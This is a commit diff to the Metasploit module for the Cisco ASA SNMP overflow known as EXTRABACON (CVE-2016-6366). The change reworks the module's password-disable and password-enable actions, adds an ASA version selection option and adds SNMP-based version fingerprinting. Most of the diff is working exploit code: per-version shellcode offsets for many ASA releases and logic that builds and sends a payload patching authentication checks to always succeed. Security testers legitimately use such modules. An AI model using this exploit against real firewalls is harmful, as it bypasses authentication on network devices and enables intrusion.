Land #7505, fixed some targets for cisco_asa_extrabacon

modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb

@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           'Nate Caroe <nate.caroe@risksense.com>',
           'Dylan Davis <dylan.davis@risksense.com>',
           'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
+          'Jeff Jarmoc <jjarmoc>', # minor improvements
           'Equation Group',
           'Shadow Brokers'
         ],
@@ -32,19 +33,29 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
           [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
         ],
-      'License'     => MSF_LICENSE
+      'License'     => MSF_LICENSE,
+      'Actions'   =>
+        [
+          ['PASS_DISABLE', {'Description' => 'Disable password authentication.'} ],
+          ['PASS_ENABLE', {'Description' => 'Enable password authentication.'} ]
+        ],
+      'DefaultAction' => 'PASS_DISABLE'
     )
+
+    @offsets = version_offsets()
+
     register_options([
-      OptEnum.new('MODE', [ true, 'Enable or disable the password auth functions', 'pass-disable', ['pass-disable', 'pass-enable']])
+      OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
     ], self.class)
 
     deregister_options("VERSION")
     datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
+  end
 
-    @asa_version_snmp = '1.3.6.1.2.1.47.1.1.1.1.10.1'
-
-    @offsets = {
-      #"9.2(4)14" => ["197.207.10.8", "118.97.40.9", "72", "0.16.185.9", "112.31.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
+  def version_offsets()
+    # Payload offsets for supported ASA versions.
+    #     See https://github.com/RiskSense-Ops/CVE-2016-6366
+    return {
       "9.2(4)13" => ["197.207.10.8", "70.97.40.9", "72", "0.16.185.9", "240.30.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
       "9.2(4)" => ["101.190.10.8", "54.209.39.9", "72", "0.48.184.9", "192.52.184.9", "85.49.192.137", "0.80.8.8", "0.91.8.8", "85.137.229.87"],
       "9.2(3)" => ["29.112.29.8",      # jmp_esp_offset, 0
@@ -56,7 +67,6 @@ class MetasploitModule < Msf::Auxiliary
                    "0.80.8.8",         # admauth_bounds, 6
                    "64.90.8.8",        # admauth_offset, 7
                    "85.137.229.87"],   # admauth_code,   8
-
       "9.2(2)8" => ["21.187.10.8", "54.245.39.9", "72", "0.240.183.9", "16.252.183.9", "85.49.192.137", "0.80.8.8", "64.90.8.8", "85.137.229.87"],
       "9.2(1)" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"],
       "9.1(1)4" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"],
@@ -90,13 +100,11 @@ class MetasploitModule < Msf::Auxiliary
       "8.0(3)" => ["141.123.131.9", "156.138.160.8", "88", "0.128.9.9", "112.130.9.9", "85.49.192.137", "0.96.6.8", "176.96.6.8", "85.137.229.87"],
       "8.0(2)" => ["155.222.211.8", "44.103.159.8", "88", "0.224.6.9", "32.237.6.9", "85.49.192.137", "0.80.6.8", "48.90.6.8", "85.137.229.87"]
     }
-
   end
 
   def check
     begin
-      snmp = connect_snmp
-      vers_string = snmp.get_value(@asa_version_snmp).to_s
+      vers_string = get_asa_version()
     rescue ::Exception => e
       print_error("Error: Unable to retrieve version information")
       return Exploit::CheckCode::Unknown
@@ -115,11 +123,11 @@ class MetasploitModule < Msf::Auxiliary
     # adds offsets to the improved shellcode
     # https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm
 
-    if mode == 'pass-disable'
+    if mode == 'PASS_DISABLE'
       always_return_true = "49.192.64.195"
       pmcheck_bytes = always_return_true
       admauth_bytes = always_return_true
-    else
+    else  # PASS_ENABLE
       pmcheck_bytes = @offsets[vers_string][5]
       admauth_bytes = @offsets[vers_string][8]
     end
@@ -157,16 +165,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run()
-
     begin
-      mode = datastore['MODE']
       session = rand(255) + 1
 
-      snmp = connect_snmp
-      vers_string = snmp.get_value(@asa_version_snmp).to_s
+      vers_string = get_asa_version()
 
-      print_status("Building #{mode} payload for version #{vers_string}...")
-      overflow = build_payload(vers_string, mode)
+      print_status("Building #{action.name} payload for version #{vers_string}...")
+      overflow = build_payload(vers_string, action.name)
       payload = SNMP::ObjectId.new(overflow)
 
       print_status("Sending SNMP payload...")
@@ -174,8 +179,9 @@ class MetasploitModule < Msf::Auxiliary
 
       if response.varbind_list
         print_good("Clean return detected!")
-        if mode == 'pass-disable'
-          print_warning("Don't forget to run pass-enable after logging in!")
+        if action.name == 'PASS_DISABLE'
+          print_warning("Don't forget to run PASS_ENABLE after logging in!")
+          print_warning("  set ACTION PASS_ENABLE")
         end
       end
 
@@ -196,4 +202,24 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
+  def get_asa_version()
+    return datastore['ASAVER'] unless (datastore['ASAVER'] == 'auto')
+    vprint_status("Fingerprinting via SNMP...")
+
+    asa_version_oid = '1.3.6.1.2.1.47.1.1.1.1.10.1'
+    mib2_sysdescr_oid = '1.3.6.1.2.1.1.1.0'
+
+    snmp = connect_snmp
+    ver = snmp.get_value(asa_version_oid).to_s
+    vprint_status("OID #{asa_version_oid} yields #{ver}")
+
+    if (ver == "noSuchInstance")
+      # asa_version_snmp OID isn't available on some models, fallback to MIB2 SysDescr
+      ver = snmp.get_value(mib2_sysdescr_oid).rpartition(' ').last
+      vprint_status("OID #{mib2_sysdescr_oid} yields #{ver}")
+    end
+
+    ver
+  end
+
 end